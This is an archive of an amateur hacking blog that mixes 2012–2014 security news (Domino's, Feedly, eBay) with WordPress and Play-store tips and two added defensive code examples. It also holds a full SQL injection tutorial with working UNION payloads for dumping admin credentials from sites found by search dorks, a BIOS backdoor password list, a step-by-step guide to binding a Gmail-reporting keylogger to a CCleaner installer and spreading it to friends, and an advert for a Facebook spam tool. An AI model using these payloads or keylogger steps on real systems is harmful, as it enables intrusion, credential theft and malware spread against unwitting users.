Wednesday, July 9, 2014

WordPress Hack

Security experts have reported a brute-force attack against WordPress blogs, and thousands of blogs have reportedly been hacked as a result of this massive attack. The attack has been confirmed by CloudFlare. It uses a botnet and automated attempts to guess the password of the default WordPress admin account. Weak passwords and the default admin username are the biggest problem, and they can lead to your blog being taken down by hackers.

Remain Safe From the Massive WordPress Brute Force Attack:
You can easily avoid this attack by following these general and very simple instructions:
Don't use the default username, i.e. admin, to log in to your blog, because it's the default account you get when you install WordPress. Be sure to add a new administrator account and change the username of that account to something random.

Don't use weak passwords, because dictionary words and words from other languages are very easy for a powerful machine to guess. Make a strong password that includes numbers and symbols.

Be sure that your WordPress version is up to date and that no surplus deactivated themes and plugins are present, as any old, vulnerable file can be the cause of a hacked WordPress blog.

The attack itself isn't that strong, but chaining together the power of many servers and hosting accounts makes it really strong against your blog. If hosting company accounts are vulnerable and taken over by hackers, a botnet attack carried out from them will be far more powerful than attacks from zombie laptops.

A recent report showed that the last reported attack relied on 90,000 IPs, which indicates how many hosting accounts have been compromised. As far as I am concerned, they are also making use of other vulnerabilities in WordPress and website structure, though the main attack is reported to be a brute-force one.

WordPress team's action on its side:
WordPress is going to roll out two-factor verification for the CMS login process, and it will make brute force die out completely and almost unusable against WordPress blogs. Unfortunately it's not possible to change the default login directory of WordPress, but one can change one's username and password. So go for it!
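One way to spot the pattern described above, where each bot IP makes only a few guesses but the aggregate is large, is to count failed wp-login.php POSTs per source and across sources in a sliding window. This is an added example, not code from the original post; the log lines are constructed, the thresholds are illustrative, and it assumes WordPress's default behaviour of answering a failed login with HTTP 200 and a successful one with a 302 redirect.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Combined/common access-log prefix: ip, timestamp, request line, status.
LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) '
)

def parse_failed_login(line):
    """Return (timestamp, ip) for a failed wp-login.php POST, else None."""
    m = LINE.match(line)
    if not m or m["method"] != "POST":
        return None
    if not m["path"].split("?")[0].endswith("/wp-login.php"):
        return None
    if m["status"] != "200":        # assumption: 200 = login form re-rendered
        return None
    return datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z"), m["ip"]

def analyze(lines, window=timedelta(minutes=5), per_ip_limit=5,
            distinct_ip_limit=10):
    """Flag noisy single sources and low-and-slow distributed guessing."""
    events = sorted(e for e in map(parse_failed_login, lines) if e)
    recent = deque()                # failures inside the sliding window
    in_window = defaultdict(int)    # ip -> failures inside the window
    noisy, peak = set(), 0
    for ts, ip in events:
        recent.append((ts, ip))
        in_window[ip] += 1
        while ts - recent[0][0] > window:
            _, old_ip = recent.popleft()
            in_window[old_ip] -= 1
            if in_window[old_ip] == 0:
                del in_window[old_ip]
        if in_window[ip] >= per_ip_limit:
            noisy.add(ip)
        peak = max(peak, len(in_window))
    return {
        "noisy_ips": noisy,
        "peak_distinct_ips": peak,
        # Many sources, each under the per-IP limit, is the botnet signature.
        "distributed": peak >= distinct_ip_limit,
    }

def sample_log():
    """Constructed log lines (documentation IP ranges), not real traffic."""
    base = datetime(2014, 7, 9, 10, 0, 0)

    def line(ip, offset, method, status):
        ts = (base + timedelta(seconds=offset)).strftime("%d/%b/%Y:%H:%M:%S +0000")
        return (f'{ip} - - [{ts}] "{method} /wp-login.php HTTP/1.1" '
                f'{status} 3012 "-" "Mozilla/5.0"')

    lines = []
    # Twelve bot sources, two failed guesses each: under any per-IP limit.
    for i in range(1, 13):
        lines.append(line(f"203.0.113.{i}", i * 5, "POST", 200))
        lines.append(line(f"203.0.113.{i}", i * 5 + 60, "POST", 200))
    # One source hammering the form on its own.
    for n in range(8):
        lines.append(line("198.51.100.7", n * 10, "POST", 200))
    # A legitimate user: loads the form, then logs in successfully.
    lines.append(line("192.0.2.10", 30, "GET", 200))
    lines.append(line("192.0.2.10", 40, "POST", 302))
    return lines

if __name__ == "__main__":
    print(analyze(sample_log()))
```

A per-IP lockout alone would catch only 198.51.100.7 in this sample; the distinct-source count is what exposes the other twelve.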

Restriction remove from google play


I am here this week with a new trick, as lots of Android smartphone users are complaining about the market being blocked for users in country-restricted regions. I personally tried this method and it worked well too! You may be well aware that you can easily enable access to the country-restricted market using a third-party application, but users are complaining that even these third-party applications don't work well after emulating the SIM to a USA carrier. I had to sort out a solution because yesterday I installed CyanogenMod, and after flashing Gapps I couldn't emulate successfully to enable all of the market's content for my country. So I tried every way, cleared the cache and emulated every SIM, but I failed. I was able to reach an application, e.g. Google Voice Search, but was unable to download it. The following error appeared on clicking download:
"This application can't be downloaded in your country", and so on; I don't remember it exactly.
Procedure I tried to unblock the applications which are country-restricted to the USA only:
Download any third-party SIM emulator like MarketAccess, Market Enabler etc. Try Googling; I can't give a link here without the developer's permission. If you need help, ask in a comment and I will email you!
After that, downgrade your upgraded market if your ROM had the old Google Market when installed/flashed. Here I am assuming that you had the previous version of Market before upgrading to the newer Google Play. In this case go to Manage Applications, select Google Play and uninstall any updates from there; it will be reverted back to Android Market.
Emulate your SIM using the program mentioned in the first step, search for any country-restricted application like Google Maps and try installing it. It will take a while, and after a couple of minutes the download will start.
In case you have Google Play preinstalled because you purchased a phone with the latest ICS release, please uninstall it using Titanium Backup and then drop a comment here to get the link for the old Market for Android. Well, OK, one link is being posted here, cheers. Download it and install it, then emulate the SIM and whoa, it's working…

Tuesday, July 8, 2014

Dominos Pizza hacked

Dominos Pizza hacked, details of 650k customers stolen 

Hackers who claimed to have compromised the database server of Domino's Pizza have demanded a ransom of €30,000 to prevent the public disclosure of customers' data.

The hacker group going by the name of Rex Mundi said they hacked into the servers of Domino's Pizza France and Belgium.

The hackers have managed to download more than 592,000 customer records from Dominos France and 58,000 records from the Belgian website.

They claim the compromised database contained sensitive information such as customers' full names, addresses, phone numbers, delivery instructions, email IDs and passwords.

The group gave a deadline of 8PM CET for Dominos to pay them.

"If they do not do so, we will post the entirety of the data in our possession on the Internet." 

Feedly Hits DDoS Attacks

Feedly and Evernote Hit by DDoS Attacks, Extortion Demands
Yesterday, the most popular RSS reader, Feedly, was down as a result of a large-scale distributed denial-of-service (DDoS) attack carried out by cybercriminals to extort money.

On Wednesday, Feedly was temporarily unavailable to its users. Feedly posted details of the attack at 5:00 AM ET on its blog, saying that it was under a Distributed Denial of Service (DDoS) attack and that cyber-criminals were demanding money in return for restoring the service to normal operation.

“Criminals are attacking feedly with a distributed denial of service attack (DDoS). The attacker is trying to extort us money to make it stop,” Edwin Khodabakchian, founder and CEO of Feedly, said in a statement on Wednesday. He also expressed regret: “We want to apologize for the inconvenience. Please know that your data is safe and you will be able to re-access your feedly as soon as the attack is neutralized.”

Feedly is a very popular RSS feed service which is available for desktop, iOS and Android devices with around 15 million users and 24,000 paying customers. It is also integrated into hundreds of other third party apps, which offers its users to browse the content of their favorite blogs, magazines, websites and more at one place via RSS feed subscriptions.

Feedly gained its popularity after Google announced the closure of its Google reader service last year. A huge number of RSS Google reader users switched to Feedly. Its popularity and reputation attracts RSS die-hards and cyber-criminals as well.

The San Francisco-based firm confirmed that some bad actors had launched a DDoS attack on its popular site and were demanding ransom money to restore the service. But the company refused to pay the criminals, which really deserves appreciation.

“We refused to give in and are working with our network providers to mitigate the attack as best as we can,” said Edwin Khodabakchian. He added, “We are working in parallel with other victims of the same group and with law enforcement.”

For those who are not familiar, a Distributed Denial-of-Service (DDoS) attack is one in which multiple compromised systems attack a single target system or service to make it unavailable to its intended users. The flood of incoming requests essentially forces the target system or service to shut down, thereby denying service to its legitimate users.

According to the company, the hackers have compromised Feedly’s network resources, but they haven’t gained access to any of its servers, and it assured its users that their data is safe.

At the time of writing, the website was still unavailable, with visitors greeted by error messages including ‘408 Request Timeout' and ‘Error 502 Timeout'. But later, the website informed its users that there was no issue with their browser or the website's CloudFlare content delivery network, whereas the host domain was unreachable at the time.
A few hours after confirming the attack, Feedly said it had made some changes to its infrastructure to bring the website online again. "However, these things take some time to put into place and it may still be a few more hours before service is restored," the company said. "Thank you so much for your patience and for sticking with us."

The popular online notes and web clippings service Evernote suffered a similar attack. It is not yet known whether the two are linked, but Feedly and Evernote work closely together.

DDoS attackers have discovered more powerful ways to attack a web service by exploiting Internet protocols such as DNS, NTP and even SNMP which allow cybercriminals to carry out record breaking DDoS attacks with the use of a little skill and relatively small amount of resources.

Feedly has set an example for all of us that it's really not right to pay ransom to bad actors; if you fulfill their demands, you are doing nothing but encouraging them to carry out more such attacks against you.

Twitter allows GIF

You Can Now Share GIFs on Twitter!

Twitter announced Wednesday afternoon that you can post GIFs that appear within your feed on, Android, and iOS.
That means you’ll be able to see the near-ubiquitous moving images in even more corners of the Web than before. It’s either a blessing or a curse, depending on how prone you are to seizures.
Previously, GIFs were shown inline only on third-party applications for Twitter, such as TweetDeck. Coincidentally, that functionality seems to be temporarily down at the moment. Poor TweetDeck; it’s had a rough couple of weeks. 
We here at Yahoo Tech are dedicated GIF lovers, which is why we’d like to celebrate this news with a good, old-fashioned … GIF PARTY!!!!
That is all.

eBay Hacked

eBay Hacked, Urges All Members to Change Passwords Immediately

The online auction and sales giant eBay posted a message Wednesday morning saying that it had been hacked, urging all of its members to change their passwords.
The company said in a statement that a database containing encrypted passwords had been breached, but that financial data, including credit card information, was stored separately and was still safe. Hackers were able to gain access to eBay employee log-ins, eBay said, which in turn gave them access to the encoded passwords.
eBay says that no unauthorized transactions have yet been made with the information. But if you’re an eBay user, you still definitely need a new password.
“[C]hanging passwords is a best practice,” the statement said, “and will help enhance security for eBay users.”
In the statement, which was unsigned, eBay said that the attack took place between late February and early March. Though the passwords that the hackers gained access to were encrypted, or obscured by a code to prevent easy reading, eBay did say that the hackers were able to access members’ names, email addresses, physical addresses, phone numbers, and dates of birth. 
The real takeaway from this: Change your eBay password (go to My eBay and open the Personal Information link you’ll see on the left). If you use the same password on multiple sites, you’ll need to change those passwords, too, should the hackers successfully break the encryption.
And if you’re looking for a strong new password, now is a good time to revisit our guide to creating secure passwords on all your online accounts.

Saturday, October 20, 2012


SQL Injection Full and Detail Guide and Tutorial - 2012

Here you will find a very detailed, step-by-step tutorial originally written by (PhortyPhour) on SQL injection. This is purely for educational purposes and is to be used at the discretion of the reader.

First we have to know what SQL injection is exactly.

SQL injection is a code injection technique that exploits a security vulnerability occurring in the database layer of an application. The vulnerability is present when user input is either incorrectly filtered for string literal escape characters embedded in SQL statements or user input is not strongly typed and thereby unexpectedly executed. It is an instance of a more general class of vulnerabilities that can occur whenever one programming or scripting language is embedded inside another. SQL injection attacks are also known as SQL insertion attacks.

That is the first paragraph of the wikipedia page for SQLi (SQL injection) found here:

I would advise reading the entire page.

What is covered in this tutorial?

Part One - Website Assessment
Section One - Finding a vulnerable website
Section Two - Determining the amount of columns
Section Three - Finding which columns are vulnerable

Part Two - Gathering Information
Section One - Determining the SQL version
Section Two - Finding the database

Part Three - The Good Stuff
Section One - Finding the table names
Section Two - Finding the column names
Section Three - Displaying the column contents
Section Four - Finding the admin page

Now let's begin.

Part One - Website Assessment

In order for us to start exploiting a website we must first know exactly what we are injecting into. This is what we will be covering in Part One along with how to assess the information that we gather.

Section One - Finding a vulnerable website

Vulnerable websites can be found using dorks (I will include a list at the end of this tutorial), either in Google or with an exploit scanner. For those of you that are unfamiliar with the term "dorks", I will try to explain.

Dorks are website URLs that are known to be vulnerable. In SQL injection these dorks look like this:


This will be inputted into a search engine and because of the "inurl:" part of the dork, the search engine will return results with URLs that contain the same characters. Some of the sites that have this dork on their website may be vulnerable to SQL injection.

Now let's say we found the page:


In order to test this site all we need to do is add a ' either in between the "=" sign and the "1" or after the "1" so it looks like this:


After pressing enter, if this website returns an error such as the following:

Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home1/michafj0/public_html/gallery.php on line 7

Or something along those lines, this means it's vulnerable to injection.

In the case where you are to find a website such as this:


Then you must use the same technique with adding a ' except it must be between the value (in this case the number) and the operator (the "=" sign) so it looks like this:


There are programs that will do this for you but to start off I would suggest simply to do things manually, using Google, and so I won't post any for you guys. If you feel so compelled to use one anyways. I recommend the Exploit Scanner by Reiluke.

Section Two - Determining the amount of columns

In order for us to be able to use commands and get results we must know how many columns there are on a website. So to find the number of columns we must use a very complex and advanced method that I like to call "Trial and Error" with the ORDER BY command.

NOTE: SQL does not care whether or not your letters are capitalized or not and I'm just doing it out of clarity, for all it cares your queries could look like this:

Code: CaN I HaZ TeH PaSSwOrDs? PLz aNd ThX

IT DOESN'T MATTER (btw please don't think that was an actual command).

So back to the ORDER BY command. To find the number of columns we write a query with incrementing values until we get an error, like this:

Code:
ORDER BY 1-- <---No error
ORDER BY 2-- <---No error
ORDER BY 3-- <---No error
ORDER BY 4-- <---No error
ORDER BY 5-- <---ERROR!

This means that there are four columns!


Section Three - Finding which columns are vulnerable

So we know that there are four columns now we have to find out which ones are vulnerable to injection. To do this we use the UNION and SELECT queries while keeping the double null (--) at the end of the string. There is also one other difference that is small in size but not in importance, see if you can spot it.

Code: UNION SELECT 1,2,3,4--

If you couldn't spot the difference, it's the extra null in between the "=" sign and the value (the number).


Now after entering that query you should be able to see some numbers somewhere on the page that seem out of place. Those are the numbers of the columns that are vulnerable to injection. We can use those columns to pull information from the database which we will see in Part Two.

Part Two - Gathering Information

In this part we will discover how to find the name of the database and what version of SQL the website is using by using queries to exploit the site.

Section One - Determining the SQL version.

Finding the version of the SQL of the website is a very important step because the steps you take for version 4 are quite different from version 5 in order to get what you want. In this tutorial, I will not be covering version 4 because it really is a guessing game and for the kind of sites that are still using it, it's not worth your time.

If we look back to the end of Section Three in Part One we saw how to find the vulnerable columns. Using that information we can put together our next query (I will be using column 2). The command should look like this:

Code: UNION SELECT 1,@@version,3,4--

Because 2 is the vulnerable column, this is where we will place "@@version". Another string that could replace "@@version" is "version()".

If the website still does not display the version try using unhex(hex()) which looks like this:

Code: UNION SELECT 1,unhex(hex(@@version)),3,4--

NOTE: If this method must be used here, it must be used for the rest of the injection as well.

Now what you want to see is something along these lines:


Which is the version of the SQL for the website.

NOTE: If you see version 4 and you would like to have a go at it, there are other tutorials that explain how to inject into it.

Section Two - Finding the database

Finding the name of the database is not always a necessary step to take to gather the information that you want; however, in my experience following these steps and finding the database may sometimes lead to a higher success rate.

To find the database we use a query like the one below:

Code: UNION SELECT 1,group_concat(schema_name),3,4 from information_schema.schemata--

This could sometimes return more results than necessary and so that is when we switch over to this query instead:

Code: UNION SELECT 1,concat(database()),3,4--

Congrats! You now have the name of the database! Copy and paste the name somewhere safe, we'll need it for later.

Part Three - The Good Stuff

This is the fun part where we will find the usernames, emails and passwords!

Section One - Finding the table names

To find the table names we use a query that is similar to the one used for finding the database with a little bit extra added on:

Code: UNION SELECT 1,group_concat(table_name),3,4 FROM information_schema.tables WHERE table_schema=database()--

It may look long and confusing but once you understand it, it really isn't so I'll try to explain. What this query does is it "groups" (group_concat) the "table names" (table_name) together and gathers that information "from" (FROM) information_schema.tables where the "table schema" (table_schema) can be found in the "database" (database()).

NOTE: While using group_concat you will only be able to see 1024 characters worth of tables so if you notice that a table is cut off on the end switch over to limit which I will explain now.

Code: UNION SELECT 1,table_name,3,4 FROM information_schema.tables WHERE table_schema=database() LIMIT 0,1--

What this does is it shows the first and only the first table. So if we were to run out of characters on let's say the 31st table we could use this query:

Code: UNION SELECT 1,table_name,3,4 FROM information_schema.tables WHERE table_schema=database() LIMIT 30,1--

Notice how my limit was 30,1 instead of 31,1? This is because when using limit it starts from 0,1, which means that the 30th is actually the 31st.

You now have all the table names!

Section Two - Finding the column names

Now that you have all of the table names try and pick out the one that you think would contain the juicy information. Usually they're tables like User(s), Admin(s), tblUser(s) and so on but it varies between sites.

After deciding which table you think contains the information, use this query (in my example, I'll be using the table name "Admin"):

Code: UNION SELECT 1,group_concat(column_name),3,4 FROM information_schema.columns WHERE table_name="Admin"--

This will either give you a list of all the columns within the table or give you an error but don't panic if it is outcome #2! All this means is that Magic Quotes is turned on. This can be bypassed by using a hex or char converter (they both work) to convert the normal text into char or hex (a link to a website that does this will be included at the end of the tutorial).

UPDATE: If you get an error at this point all you must do is follow these steps:

1. Copy the name of the table that you are trying to access.
2. Paste the name of the table into this website where it says "Say Hello To My Little Friend".
Hex/Char Converter
3. Click convert.
4. Copy the string of numbers/letters under Hex into your query so it looks like this:

Code: UNION SELECT 1,group_concat(column_name),3,4 FROM information_schema.columns WHERE table_name=0x41646d696e--

Notice how before I pasted the hex I added a "0x", all this does is tells the server that the following characters are part of a hex string.

You should now see a list of all the columns within the table such as username, password, and email.

NOTE: Using the limit function does work with columns as well.
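The probes in Part One and the Magic Quotes bypass above both depend on request text being pasted into the SQL statement. The following is an added example, not part of the original tutorial, using Python's sqlite3 rather than the PHP/MySQL stack the tutorial targets, to show why quote escaping does not help when the value sits in a numeric context and how a typed, bound parameter removes the behaviour; the gallery table, its rows and the function names are constructed for illustration.

```python
import sqlite3

COLUMNS = "id, title, caption, path"

def make_db():
    """In-memory database with constructed sample rows (four columns,
    matching the column count used in the tutorial's examples)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE gallery (id INTEGER PRIMARY KEY, "
               "title TEXT, caption TEXT, path TEXT)")
    db.executemany("INSERT INTO gallery VALUES (?, ?, ?, ?)", [
        (1, "Sunset", "Beach at dusk", "/img/1.jpg"),
        (2, "Harbor", "Boats at rest", "/img/2.jpg"),
    ])
    return db

def lookup_concat(db, raw_id):
    """VULNERABLE: the request value becomes part of the statement text."""
    sql = f"SELECT {COLUMNS} FROM gallery WHERE id = " + raw_id
    return db.execute(sql).fetchall()

def lookup_escaped(db, raw_id):
    """STILL VULNERABLE: quote escaping, which is all Magic Quotes attempted,
    changes nothing when the value is used as a number, not a string."""
    escaped = raw_id.replace("'", "''")
    sql = f"SELECT {COLUMNS} FROM gallery WHERE id = " + escaped
    return db.execute(sql).fetchall()

def lookup_bound(db, raw_id):
    """HARDENED: strong typing first, then a bound parameter, so the
    value can never be parsed as SQL."""
    if not (raw_id.isascii() and raw_id.isdigit()):
        return []                      # reject anything that is not an id
    sql = f"SELECT {COLUMNS} FROM gallery WHERE id = ?"
    return db.execute(sql, (int(raw_id),)).fetchall()

def outcome(lookup, db, raw_id):
    """What the visitor would observe: 'error', 'rows' or 'empty'."""
    try:
        rows = lookup(db, raw_id)
    except sqlite3.Error:
        return "error", []
    return ("rows" if rows else "empty"), rows

# Request values patterned on the ones the tutorial text describes.
PROBES = [
    "1'",
    "1 ORDER BY 4--",
    "1 ORDER BY 5--",
    "-1 UNION SELECT 1,2,3,4--",
]

def compare():
    """Run every probe through all three lookups and collect the outcomes."""
    db = make_db()
    lookups = (lookup_concat, lookup_escaped, lookup_bound)
    return {p: {fn.__name__: outcome(fn, db, p)[0] for fn in lookups}
            for p in PROBES}

if __name__ == "__main__":
    for probe, seen in compare().items():
        print(f"{probe!r:32} {seen}")
```

The differing error and row outcomes of the first two lookups are exactly the signal the tutorial's trial-and-error steps read; the bound lookup returns the same empty result for every probe, so there is nothing to read.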

Section Three - Displaying the column contents

We're almost done! All we have left to do is to see what's inside those columns and use the information to login! To view the columns we need to decide which ones we want to see and then use this query (in this example I want to view the columns "username", "password", and "email", and my database name will be "db123"). This is where the database name comes in handy:

Code: UNION SELECT 1,group_concat(username,0x3a,password,0x3a,email),3,4 FROM db123.Admin--

In this query, 0x3a is the hex value of a colon (:) which will group the username:password:email for the individual users just like that.

FINALLY! Now you have the login information for the users of the site, including the admin. All you have to do now is find the admin login page which brings us to Section Four.

Section Four - Finding the admin page

Usually the admin page will be directly off of the site's home page, here are some examples:


Once again there are programs that will find the page for you but first try some of the basic guesses, it might save you a couple of clicks. If you do use a program Reiluke has coded one for that as well. Search Admin Finder by Reiluke.

And that concludes my tutorial! I hope it was helpful to some of you. Remember to keep practicing and eventually you'll have all of the queries memorized in no time!

Comment and Rate!

Also I would like put a commonly used dork list.

Dork List


Monday, October 8, 2012

Bios passwd


Here is a list of some BIOS backdoor passwords for many mainboard manufacturers:

Award BIOS backdoor passwords:

pint------------589589-------- aPAf
J256------------syxz-----------AWARD SW
J262------------shift + syxz---AWARD PW
j332------------TTPTHA-------- AWKWARD

AMI BIOS Backdoor Passwords:

Phoenix BIOS Backdoor Passwords:

Misc. Common Passwords

Other BIOS Passwords by Manufacturer
VOBIS & IBM---- merlin
Biostar-------- Biostar
Packard Bell----bell9
HP Vectra------hewlpack

Pen drive threat

Pen Drives main threat to Cyber Security: Army


New Delhi, Sep 30: Despite a ban, use of pen drives has emerged as the main threat to cyber security in defence forces as it is responsible for over 70 per cent of such breaches in the three Services.
The use of pen drives as an easy-to-carry storage device has increased in the recent past and internal reports have confirmed that over 70 per cent cyber security breaches in the armed forces are due to their unauthorised use, Army officials told PTI here.
"These pen drives, which are mostly manufactured in China, have emerged as a big threat to our cyber security systems," they said.
Fresh cyber security guidelines have been issued by the Army headquarters to protect sensitive military networks from hacker attacks, sources said.
Measures have been taken by the other two services also to tighten their cyber security as IAF also recently issued instructions to its personnel warning them against having any official data on their personal computers and pen drives.
All personnel have been asked to declare their Information Technology assets and have been asked not to have any official data on them, IAF officials said here.
Anybody found violating these instructions in checks by cyber security personnel will draw strict action which may even amount to disciplinary action including court martial, they said.
When asked about the development, IAF spokesperson Wg Cdr Gerard Galway confirmed the steps taken by the Air headquarters to safeguard its cyber assets and secret information.
Sources said generally it is found that officials use pen drive to store official data for use at their personal computers but from there, it is transmitted from their IP addresses to hackers from the 'malware' present in the pen drives.
About a couple of years ago, a Major posted in Andaman and Nicobar Islands was apprehended as it was found that sensitive data was being transferred from his computer.
However, it later emerged that his system had been hacked and spying viruses were transferring information to other computers.
An IAF Junior Warrant officer was also apprehended by officials after he was found in possession of unauthorised CDs carrying official information.
The Navy's Eastern Command was also affected after hacker groups were found to be stealing information from its computers there due to malware put in them by external drives.
As part of efforts to counter cyber attacks, the National Security Council has also been discussing designating certain intelligence agencies under the Defence Ministry for countering cyber offensives against the country.

Friday, September 28, 2012


Check if Your Ports are Hacked or NOT
A website tells you if your computer's ports are hacked or not

This server will now attempt to open several common ports on your computer. The results of these attempts will be displayed on this page as Open, Closed, or Secure:

If your firewall is configured to block a port, and it is operating correctly, you will see Secure and an event will be logged on your firewall.
A Closed port indicates that the port is reachable but there is no program currently accepting connections there.
If the port is indicated as Open there is an application or service on your computer actively accepting connections.

The time to check each port will range from less than a second up to 20 seconds. Ports which are Secure will take the most time. If you are secure, after the test ends it tells you:

Test complete.
No open ports were found
click below link

Thursday, September 13, 2012

Huck fb passwd

Hack facebook password remotely
Hacking Facebook account is very easy and just requires not more than 10 minutes of work. Don't worry i will also tell you how to protect your facebook account or passwords from such hacks and hackers. But for this you must know how hackers hack your facebook account. So first i teach you how to hack facebook account remotely and then i will tell how to protect yourself from this.

So guys lets start hacking Facebook account or passwords....

Steps to hack Facebook account using Keylogger:
1. Creating the Keylogger Server to hack Facebook passwords.
2. Extracting the Icon from installer.
3. Bind the keylogger server with any software setup.
4. How to spread your keylogger or send it to your friends to hack their Facebook accounts or passwords.

Step 1. Creating the Keylogger Server
1. Download the keylogger.

2. Extract the file, Now you will get two folders:
a. First one contains Keylogger and Binder
b. Second Contains resource hacker tool.( to extract the icons from installers).

3. Now open the Keylogger. It contains two files one for gmail email and other for password. For this create one test account on Gmail and enter it's details in this.

4. After entering email and password. Set the time interval usually set 3 mins i.e. after how much time you want to receive logs from the user.
5. Now click on send verification mail. This mail is to test that your keylogger is working correctly or not.
6. After you click this you will receive a confirmation mail on test account which will confirm that keylogger is working.
7. Now click on generate to set the mutex (any secret key to make your keylogger FUD) and then click on compile server.
8. Now save the file to desktop or any other location of your choice. Now your server is ready but it can be easily detected.

Step 2.: Extracting the Icon file from any installer(resource hacker)
1. Open the Resource hacker folder and open the reshacker file.
2. Now go to its menu and open any setup file. Suppose we want to attach our keylogger toCcleaner setup file. So open the Ccleaner setup with resource hacker.
3. Now in menu there is one action button click on it and then click save all resources.
4. Now save all the resources to desktop or any other location of your choice.
5. It consists of two files one is icon file and other is res file . We only need icon file, so you can delete the other file i.e res file.
6. Now we have Icon of installer file(as discussed above Ccleaner setup Icon).

Step 3: Bind the Keylogger server with any software
1. Now Go to keylogger folder and open the Binder.
2. Now Click on + button given below to add files.
3. Now add the keylogger server and the set up of software (i.e. in our case it's Ccleaner setup).
4. Now in menu of Binder, Go to Settings. There select the icon that we have generated in the previous step and set the location of output file as shown in figure.
5. Now again go to File's menu in Binder and click on Bind files.
6. Now your Binded keylogger is ready. Now you have to spread it or send it to the slave that is your friend.

Step4 : How to Spread Keylogger or send it to slave or friend
1. Now you have one Software setup file with keylogger attached with it.(In our case we have Ccleaner setup with keylogger attached with it.
2. Now Spread your keylogger through forums. You might be a member of various forums use them to spread your keylogger in form of software posts. You can use various software's to spread them that users frequently download.
3. Spread it through pendrives or USB hard drives. Suppose a friend asked you for a software give it the software that has keylogger attached with it.
Note: you can also attach keylogger with images also. But that can be detectable by antivirus. So avoid such type of hacking.
So isn't that so easy to hack anyone's Facebook account in just few minutes.

How to protect yourself from these hacks?
Prevention is always better than cure so always follow these steps:
1. Don't use cracked software and don't download software from unauthorized websites.
2. Always keep your antivirus and anti-spyware up to date.
3. Always scan the files before transferring them to your USB.
4. Do not allow other users to use your PC i.e password protect it.

fb frnd bomber

Facebook Friend Bomber 2.0.1
1. Mass Facebook Amber Alerts (New)
2. Mass Facebook Friend Requests
3. Mass Facebook Friend Messages
4. Mass Facebook Friend Pokes
5. Mass Facebook Wall Poster
6. 100% CAPTCHA Bypass*
7. Single & Unlimited Licenses
Download: Facebook Friend Bomber 2.0.1

